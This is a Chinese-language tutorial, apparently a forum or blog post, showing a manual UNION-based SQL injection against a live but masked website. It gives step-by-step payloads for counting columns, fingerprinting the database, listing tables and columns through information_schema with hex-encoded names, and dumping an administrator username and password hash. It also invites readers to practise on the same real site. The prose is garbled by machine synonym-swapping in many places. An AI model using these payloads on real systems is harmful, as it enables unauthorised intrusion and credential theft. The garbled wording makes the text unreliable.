教程简单，旨在分享,如果能辅佐到伴侣们那就更好,另一个就是写出来的话我记得深刻点,以后哪天忘了一看8090安适小组的这篇文章就可以拿起来用。注入点*****.com/cp.php?sid=-3

我们看，返回正常然后and 1=2看一下（其实这里只要等号前后的数值差别就可以，and=且 如果网站过滤and 我们用xor也一样的，只不过相反。）下面的图片已经不显示了，说明存在注入。

然后order by 1 看看是否返回正常，如果连1都错的话那么就有问题了。所以大家注入的时候可以先用1尝尝没问题在向下进行。好的，返回正常，就不截图了。看看有几多字段吧 order by 10 堕落 我们用折半法 order by 5 还是堕落 order by 2 正确order by 3 堕落 那就说明是2然后就可以爆显位了，***.com/cp.php?sid=3 UNION SELECT 1,2其实就是：注入点 UNION SELECT 字段看看会产生什么。。

我们看到网页爆出来2个2，先不管那么多。只要知道2是显位就可以。(如果没有爆出来的话，可以在参数=这里加一个-号 或者前面加上and 1=2 只要让他报错都可以)然后就是php注入非常重要的部分，要收集信息。先不解释，看下面操纵就大白了。version()获取版本database()获取数据库名user()获取当前用户@@version_compile_os 获取操纵系统信息这个怎么用呢？其实非常简单。我们先来获取版本信息***.com/cp.php?sid=3 UNION SELECT 1,version()就是（注入点 UNION SELECT version()）注意version()是插在显位数字那里的。不大白不妨多试几遍就懂了。看下图：

我们看到爆出了 5.0.77 这个版本信息。php注入的时候我们只要看他是大于5.0还是小于5.0.这里是大于5.0的版本，如果我们发明它是小于5.0的那么我们就不是这种要领注入了，要麻烦的多。好了继续爆数据库信息 database()获取数据库名。

好了，我们获得了数据库名：dfdn20120724 这对我们非常重要。继续爆user()获取当前用户

我们得到了系统当前用户：dfdn20120724_f@localhost还有一个我们要看看它的操纵系统信息：@@version_compile_os 获取操纵系统信息

获取到操纵系统信息：redhat-linux-gnu 我们发明是Liuux的系统，哪怕我们对它一窍欠亨也不妨，不要在意。好了整理一下我们收集到的信息：数据库版本：5.0.77数据库名：dfdn20120724当前用户：dfdn20120724_f@localhost操纵系统：redhat-linux-gnu【然后下面就是重点了，这个对象是死的，大家只要记住就可以。我留个公式下来：】-------------------------------------------嘿嘿，在吗----------------------------------------------------获取表名：注入点 UNION SELECT 1,table_name from information_schema.tables where table_schema=编码后(数据库名）获取表段和字段：注入点 UNION SELECT 1,column_name from information_schema.columns where table_name=编码后(表名）获取指定表下的指定字段信息注入点 UNION SELECT 1,字段名 from 表名-------------------------------------------在啊，有事吗----------------------------------------------------额额，不扯了。继续。不过记住分隔断绝分手符里面的公式，以后只要把注入点和信息填进去就行。首先来获取表名：注入点 UNION SELECT 1,table_name from information_schema.tables where table_schema=编码后(数据库名）凭据公式把我们的注入点替换上去功效为下：***.com/cp.php?sid=3 UNION SELECT 1,table_name from information_schema.tables where table_schema=编码后(数据库名）最后还有个数据库名，这个我们前面已经通过显位database()爆出来了为：dfdn20120724然后我们需要用转换工具来编码一下，我用的是小葵。看下图操纵

在第一行粘贴我们要转换的内容(我们爆出的数据库名)，然后看图片下面的箭头，Hex对应的内容：0x6466646E3230313230373234?sid=3 UNION SELECT 1,table_name from information_schema.tables where table_schema=编码后(数据库名）然后把这个数据库名转换功效替换上去前后功效为：***.com/cp.php?sid=3 UNION SELECT 1,table_name from information_schema.tables where table_schema=0x6466646E3230313230373234看上面的语句会发明information_schema.tables 为什么要写这串英文呢？因为版本大于5.0的话有个自带的表，就是它所有如果小于5.0就么有这张表 注入语句也不会这么写。好了，用它来获取数据库表名，我们访谒尝尝。看图：

很酸爽的觉得，。的觉得。觉得。.觉(不要惊奇，这是回音。。。。是回音。。。回音。。音..)。....。。。好的，表全部爆出来了(如果没有全部爆出来，我们只需要把table_name用英文括号括起来，前面加个group_concat 再次访谒，就可以获取到所有表)下面就是我们爆出来的所有表，我们要做的工作是判断哪张表是有我们要的打点账号暗码，不才面等你们。。。。。1.web_config 2.administrator 3.info 4.pic 5.datainfo 6.lyan 7.link 8.web_config 9.dhuo·10.nyy_administrator 11.cpclass 12.class13. ly_info1我在这。。。。好的，有些经验的伴侣很容易看出来 administrator，这张表很可能是打点表所以开始如下↓获取字段：注入点 UNION SELECT 1,column_name from information_schema.columns where table_name=编码后(表名)大 家注意：这个时候我们要获取指定表下面的字段，所有最后就不是编码的数据库名，而是我们要获取的表名 这里为 administrator 这张表。我们把它用如上要领转换一下得出：0x61646D696E6973747261746F72 然后 此时的注入语句为：↓?sid=3 UNION SELECT 1,column_name from information_schema.columns where table_name=0x61646D696E6973747261746F72我们粘贴上去看下图：↓

可以看到已经爆出来了administrator这张表下的字段，整理如下:1.sdate 2.pwd 3.id4.uidpwd里面应该是暗码 那么用户名呢？没有看到user 或者name之类的表啊，不妨 我们先来爆暗码此时的语句就简单多了：获取指定表下的指定字段信息注入点 UNION SELECT 1,字段名 from 表名这里把注入点替换****.com/cp.php?sid=3 字段名替换pwd 表名替换为administrator得出注入语句功效如下↓ ：***.com/cp.php?sid=3 UNION SELECT 1,pwd from administrator功效如下：

爆出来暗码了，....先记录一下：等会再解密，应该还不知道用户名暗码：7fef6171469e80d32c0559f88b377245还有3个字段：sdate iduid开始找用户名： sdate 的英辞意思为姓名，id和uid一般都是编号序号之类的我们尝尝sdate?sid=3 UNION SELECT 1,pwd from administrator这时候注入语句只需要把上面的pwd替换成sdate就可以了****.com/cp.php?sid=3 UNION SELECT 1,sdate from administrator访谒尝尝：功效如下图：

好吧，只是时间而已。已经走到这里千万别放弃，我们尝尝uid这个字段。因为林子大了上面鸟都有，谁也不知道下一秒会产生什么...什么.....么(我们见过，我是回音).....言归正传：注入语句为：***.com/cp.php?sid=3 UNION SELECT 1,uid from administrator当作果；

没错，uid报出了打点用户名。用户名：amdin 暗码:7fef6171469e80d32c0559f88b377245这里解密后的暗码和后台我就不放出来了，这样的话可以多一些人练练手。不然很快就被搞死了。